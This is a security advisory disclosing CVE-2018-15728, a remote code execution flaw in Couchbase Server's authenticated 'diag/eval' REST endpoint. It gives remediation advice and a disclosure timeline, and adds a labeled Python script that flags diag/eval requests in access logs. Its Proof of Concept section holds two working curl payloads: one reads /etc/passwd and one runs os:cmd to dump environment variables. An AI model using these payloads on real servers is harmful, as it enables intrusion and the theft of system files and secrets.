Couchbase Server Remote Code Execution

Filip Palian
2018-08-24
packetstormsecurity.com (PACKETSTORM:149068)

EPSS: 0.022 (percentile 89.4%)

Hey,  
  
Description:  
Couchbase Server [1] exposes a REST API [2] which by default is  
available on TCP/8091 and/or TCP/18091.  
Authenticated users can send arbitrary Erlang code to the 'diag/eval'  
endpoint of the API. The code is subsequently executed on the  
underlying operating system with the privileges of the user that was  
used to start Couchbase.  
The 'diag/eval' endpoint is referenced in the official documentation  
[3][4][5]; however, the documentation does not contain any information  
about the risks associated with allowing access to the endpoint in  
question.  
Unfortunately, I was not able to confirm which versions of Couchbase  
are affected and whether the 'diag/eval' endpoint is enabled by default.  
You can use the PoC provided below to verify whether your installation  
is affected.  
  
Proof of Concept:  
1. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval  
-X POST -d 'case file:read_file("/etc/passwd") of {ok, B} ->  
io:format("~p~n", [binary_to_term(B)]) end.'  
2. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval  
-X POST -d 'os:cmd("env")'  
  
Remediation:  
Contact the vendor for remediation guidance. Alternatively, restrict  
access to the REST API and/or the 'diag/eval' endpoint.  
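As an added, defender-side example that is not part of the advisory: a small Python script that flags requests to the 'diag/eval' endpoint in an HTTP access log, so that restricted or monitored access to the endpoint can actually be checked. The log lines are constructed, and their Common Log Format is an assumption about how such a log would look, not something the advisory states.

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample access-log lines in Common Log Format. The exact format
# of Couchbase's own HTTP access log is an assumption, not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - admin [23/Aug/2018:10:01:02 +0000] "GET /pools/default HTTP/1.1" 200 1532
10.0.0.9 - admin [23/Aug/2018:10:01:07 +0000] "POST /diag/eval HTTP/1.1" 200 87
10.0.0.9 - - [23/Aug/2018:10:01:09 +0000] "POST /diag/eval HTTP/1.1" 401 0
10.0.0.5 - admin [23/Aug/2018:10:02:15 +0000] "GET /diag HTTP/1.1" 200 4096
10.0.0.7 - ops [23/Aug/2018:10:03:44 +0000] "POST /DIAG/EVAL/?x=1 HTTP/1.1" 200 12
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Return the fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return dict(m.groupdict()) if m else None

def is_diag_eval(path: str) -> bool:
    """Match /diag/eval regardless of query string, case or trailing slash.
    Folding case over-flags rather than under-flags: a hit is a lead for
    review, and the status code says whether the server accepted it."""
    path = path.split("?", 1)[0].rstrip("/").lower()
    return path == "/diag/eval"

def find_diag_eval_requests(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return every parsed request that targets the diag/eval endpoint."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_diag_eval(str(rec["path"])):
            rec["accepted"] = str(rec["status"]).startswith("2")  # 2xx = executed
            hits.append(rec)
    return hits

def summarize(hits: List[Dict[str, object]]) -> Dict[Tuple[str, str], Tuple[int, int]]:
    """Per (source, user): total diag/eval requests and how many were accepted."""
    out: Dict[Tuple[str, str], Tuple[int, int]] = {}
    for h in hits:
        key = (str(h["src"]), str(h["user"]))
        total, ok = out.get(key, (0, 0))
        out[key] = (total + 1, ok + int(bool(h["accepted"])))
    return out

if __name__ == "__main__":
    for (src, user), (total, ok) in summarize(find_diag_eval_requests(SAMPLE_LOG.splitlines())).items():
        print(f"{src} user={user}: {total} diag/eval request(s), {ok} accepted")
```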
  
Timeline:  
18.06.2018: Following vendor guidelines [6], the information about the  
issue was sent to [email protected].  
20.06.2018: Follow-up email was sent to the vendor to confirm receipt  
of the original report.  
21.08.2018: MDSec published an advisory about a similar vulnerability  
in Apache CouchDB [7].  
21.08.2018: CVE requested from MITRE.  
22.08.2018: MITRE assigned CVE-2018-15728 for this issue.  
23.08.2018: The advisory has been released.  
  
References:  
[1] https://www.couchbase.com/  
[2] https://developer.couchbase.com/documentation/server/current/rest-api/rest-intro.html  
[3] https://developer.couchbase.com/documentation/server/3.x/admin/Tasks/xdcr-modify-settings.html  
[4] https://developer.couchbase.com/documentation/server/4.1/security/security-comm-encryption.html  
[5] https://developer.couchbase.com/documentation/server/4.1/security/security-client-ssl.html  
[6] https://www.couchbase.com/resources/security#VulnerabilityReporting  
[7] https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/  
  
  
Thanks,  
Filip Palian  